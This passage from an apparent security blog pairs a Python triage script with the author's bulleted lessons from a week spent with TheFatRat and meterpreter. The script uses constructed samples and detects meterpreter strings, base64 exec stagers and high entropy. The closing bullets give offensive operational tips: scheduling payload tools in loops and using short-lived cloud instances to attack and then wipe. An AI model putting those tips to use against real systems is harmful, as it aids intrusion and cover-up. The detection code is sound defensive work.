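The quick triage the post leans on (string indicators from the strings dump, the entropy column in the rahash2 output, the base64-of-exec stager) written out as one script. This is an added example; it is neither the post's code nor anything from TheFatRat or Metasploit. The indicator strings are the ones visible in the strings dump above, the sample byte buffers are constructed here so the script runs offline, and the entropy is plain Shannon entropy in bits per byte (rahash2 prints its own encoding, which this does not try to reproduce).

```python
"""Triage a binary for the indicators discussed in the post.

Added example (not from the original post, TheFatRat or Metasploit). A
YARA-style "any of these strings" check, a base64-blob decoder for the
base64-of-exec stager variant, and a Shannon entropy check. All sample
buffers are constructed; none are real malware bytes.
"""
import base64
import math
import re
from collections import Counter

# Indicator strings taken from the strings dump earlier in the post
INDICATORS = {
    "meterpreter": [b"core_pivot_session_died", b"stdapi"],
    "token_process_apis": [b"ImpersonateLoggedOnUser", b"CreateToolhelp32Snapshot",
                           b"AllocateAndInitializeSid"],
}

# A run of 40+ base64-alphabet bytes, optionally padded
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def find_indicators(data: bytes) -> dict:
    """YARA-style check: which indicator strings occur, grouped by rule name."""
    return {name: [s.decode() for s in needles if s in data]
            for name, needles in INDICATORS.items()}


def decoded_base64_runs(data: bytes, min_len: int = 40) -> list:
    """Decode every long base64 run in the buffer; runs that don't decode are skipped."""
    out = []
    for m in B64_RUN.finditer(data):
        run = m.group(0)
        run = run[: len(run) - len(run) % 4]  # drop a trailing partial quantum
        if len(run) < min_len:
            continue
        try:
            out.append(base64.b64decode(run, validate=True))
        except ValueError:  # binascii.Error is a ValueError
            continue
    return out


def triage(data: bytes) -> dict:
    """Combine the checks into a verdict with human-readable reasons."""
    hits = find_indicators(data)
    blobs = decoded_base64_runs(data)
    ent = shannon_entropy(data)
    reasons = []
    if hits["meterpreter"]:
        reasons.append("meterpreter strings: " + ", ".join(hits["meterpreter"]))
    if len(hits["token_process_apis"]) >= 2:
        reasons.append("token/process enumeration API cluster")
    if any(b"exec(" in b for b in blobs):
        reasons.append("base64 blob decodes to exec(...)")
    if ent > 7.0:  # rough rule of thumb for packed/encrypted content
        reasons.append("high entropy %.2f bits/byte" % ent)
    return {"entropy": round(ent, 3), "indicators": hits,
            "base64_runs": len(blobs), "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples (not real malware bytes)
SAMPLE_STAGER = (b"MZ" + b"\x00" * 64 + b"core_pivot_session_died\x00stdapi\x00"
                 + b"ImpersonateLoggedOnUser\x00CreateToolhelp32Snapshot\x00" + b"\x00" * 64)
SAMPLE_B64_PAGE = (b"<html>"
                   + base64.b64encode(b"exec(constructed_sample_payload_text_for_demo_only)")
                   + b"</html>")
SAMPLE_BENIGN = (b"MZ" + b"\x00" * 128
                 + b"GetSystemTimeAsFileTime\x00QueryPerformanceCounter\x00")

if __name__ == "__main__":
    for name, buf in [("stager", SAMPLE_STAGER), ("b64 page", SAMPLE_B64_PAGE),
                      ("benign", SAMPLE_BENIGN)]:
        r = triage(buf)
        print(f"{name:9s} suspicious={r['suspicious']} entropy={r['entropy']} {r['reasons']}")
```

The base64 check is what catches the "exec" stager variant in a page body where no PE strings exist; the string rules are what catch the meterpreter stage. Neither replaces a real YARA ruleset, but the combination is what a five-minute triage actually looks at.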

Things I learned with this week of dickery:

  • People seem to be rummaging through and analyzing things they happen across, or that were involved in something flagged by the APT detection BS. 
  • Apparently people detect meterpreter data as part of Poison Ivy.
    • Looked further; neat, the copy of Poison Ivy I have does partially contain code from the stdapi nonsense meterpreter sends down. 
  • TheFatRat as a wrapper is pretty nice, but it can be skipped in favour of running the power.py and pw_exec.py tools on your own, such as in a cron/at/while loop. 
  • Automated tools used when analyzing things often take weaker precautions than those meant to provide the reports. 
  • A $5 cloud or docker instance, for a few hours of playing with just a minimal amount of preparation beforehand, builds a fully purposed suite for rapid spin up, attack, and spin down. 
    • Better yet, cloud services providing per-hour pay, awww yeah... just don't assume they actually destroy things when it seems they did; go ahead and zero-fill everything that you don't want shared before you deprovision. 

-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour
